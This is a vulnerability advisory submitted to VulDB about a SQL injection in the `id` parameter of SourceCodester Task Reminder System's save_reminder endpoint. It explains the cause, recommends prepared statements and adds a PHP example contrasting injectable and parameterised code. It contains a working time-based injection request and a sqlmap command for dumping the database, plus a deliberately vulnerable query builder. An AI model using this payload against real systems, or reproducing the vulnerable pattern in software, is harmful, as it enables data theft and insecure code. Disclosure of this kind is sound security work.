| Title | SourceCodester Task Management System POST sql injection |
|---|
| Description | I found a SQL injection vulnerability in the SourceCodester Task Management System (https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html).
It affects the file /php-trs/classes/Master.php?f=save_reminder. The following request triggers it (note the `id` parameter in the body):
POST /php-trs/classes/Master.php?f=save_reminder HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6
Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)#
The payload `1'and sleep(4)#` is a time-based check: if the response is delayed by about four seconds relative to a normal request, the injected SLEEP() ran inside the query. Save the request as 1.txt and hand it to sqlmap with `sqlmap -r 1.txt --data="id=1"`; sqlmap can then dump the database.
The vulnerable statement is "UPDATE `reminder_list` set {data} where id = '{id}'". The user-controlled `id` parameter is interpolated directly into the query without validation or escaping, so a single quote in `id` closes the string literal and everything after it is executed as SQL (the trailing `#` comments out the original closing quote). The proper fix is to stop building the query from strings: validate `id` as an integer and pass it through a prepared statement with a bound parameter (mysqli prepare/bind_param). Escaping `id` with mysqli_real_escape_string() only neutralises the quote inside the literal and is a weaker mitigation than parameterised queries; it also does nothing for the `{data}` portion if that is built from request fields in the same way. |
|---|
| Source | https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html |
|---|
| User | fushuling (UID 45488) |
|---|
| Submitted | 10/26/2023 07:07 PM (2 years ago) |
|---|
| Moderation | 10/26/2023 08:21 PM (1 hour later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 243645 [SourceCodester Task Reminder System 1.0 Master.php?f=save_reminder ID SQL injection] |
|---|
| Points | 20 |
|---|
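The description above quotes the injectable UPDATE and recommends a fix. The following is an added example, not code from the Task Reminder System or from the submitter: it is a simplified, hypothetical reconstruction of a `save_reminder` handler that builds the query the way the advisory describes, placed beside a parameterised version. The function names, the column whitelist and the `$conn` mysqli connection are assumptions for illustration; only the `reminder_list` table name and the `UPDATE ... where id = '{id}'` shape come from the advisory.

```php
<?php
// Added example (hypothetical, not the project's own code).
// Shows the injectable query-building pattern described in the advisory
// and a parameterised replacement for the same handler.

// VULNERABLE: every POST field is interpolated into SET, and id into WHERE.
// Returns the SQL string so the effect of a hostile id is visible without a DB.
function build_update_sql_vulnerable(array $post): string
{
    $set = [];
    foreach ($post as $k => $v) {
        if ($k === 'id') {
            continue;
        }
        $set[] = "`{$k}` = '{$v}'";
    }
    // With id = "1'and sleep(4)#" this yields
    //   ... where id = '1'and sleep(4)#'
    // The quote closes the literal, SLEEP(4) runs, and # comments out the rest.
    return "UPDATE `reminder_list` set " . implode(', ', $set)
         . " where id = '{$post['id']}'";
}

// FIXED: whitelist the updatable columns, validate id as an integer,
// and bind every value as a parameter so input never becomes SQL syntax.
function save_reminder_fixed(mysqli $conn, array $post): bool
{
    // Column names are assumed for illustration; attacker-chosen keys
    // in $post never reach the query because only these are used.
    $allowed = ['user_id', 'title', 'description', 'remind_from', 'remind_to', 'status'];

    $set    = [];
    $params = [];
    foreach ($allowed as $col) {
        if (array_key_exists($col, $post)) {
            $set[]    = "`{$col}` = ?";
            $params[] = (string) $post[$col];
        }
    }
    if ($set === []) {
        return false;
    }

    // Reject anything that is not an integer before it gets near the query.
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false) {
        return false;
    }
    $params[] = $id;

    $sql  = "UPDATE `reminder_list` SET " . implode(', ', $set) . " WHERE id = ?";
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        return false;
    }
    // One 's' per SET value, then 'i' for the integer id.
    $types = str_repeat('s', count($set)) . 'i';
    $stmt->bind_param($types, ...$params);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Demonstration of the vulnerable builder with the advisory's payload
// (constructed input; no database needed).
$post = [
    'user_id'     => '1',
    'title'       => '1',
    'description' => '1',
    'remind_from' => '0011-01-01',
    'remind_to'   => '0222-01-01',
    'status'      => '1',
    'id'          => "1'and sleep(4)#",
];
echo build_update_sql_vulnerable($post), PHP_EOL;
```

Running the script prints the query with `where id = '1'and sleep(4)#'` at the end, which is exactly why the time-based probe in the request above works. In the fixed version the same payload fails `FILTER_VALIDATE_INT` and the handler returns before any SQL is issued; even if a non-integer column were involved, a bound `?` parameter is sent to MySQL as data, not parsed as part of the statement.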